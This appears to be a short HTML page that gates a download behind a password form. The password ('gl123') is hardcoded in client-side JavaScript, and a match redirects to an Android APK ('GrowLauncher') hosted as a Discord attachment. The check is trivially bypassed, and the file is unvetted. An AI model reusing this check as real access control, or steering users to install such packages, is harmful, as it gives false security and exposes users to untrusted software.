<!DOCTYPE html>
<html>
<head>
    <title>Protected Link</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
        }
        input[type=password] {
            width: 80%;
            padding: 10px;
            margin: 10px auto;
            display: block;
        }
        button {
            padding: 10px 20px;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }
        button:hover {
            background-color: #45a049;
        }
        #message {
            color: red;
        }
    </style>
</head>
<body>

<h2>Enter Password to Open the Link</h2>

<form onsubmit="checkPassword(); return false;">
    <input type="password" id="password" name="password" placeholder="Password">
    <button type="submit">Submit</button>
</form>

<p id="message"></p>

<script>
    function checkPassword() {
        var password = document.getElementById("password").value;
        if (password === "gl123") {
            window.location.href = "https://cdn.discordapp.com/attachments/901662125091606598/1331228442355564624/GrowLauncher_v6.1.21.apk?ex=6790da99&is=678f8919&hm=f8684ed3c979834813aef3c29c3ebcc2d16bf56dd02486388f5ab2d59cf87afe&";
        } else {
            document.getElementById("message").textContent = "Incorrect password. Please try again.";
        }
    }
</script>

</body>
</html>
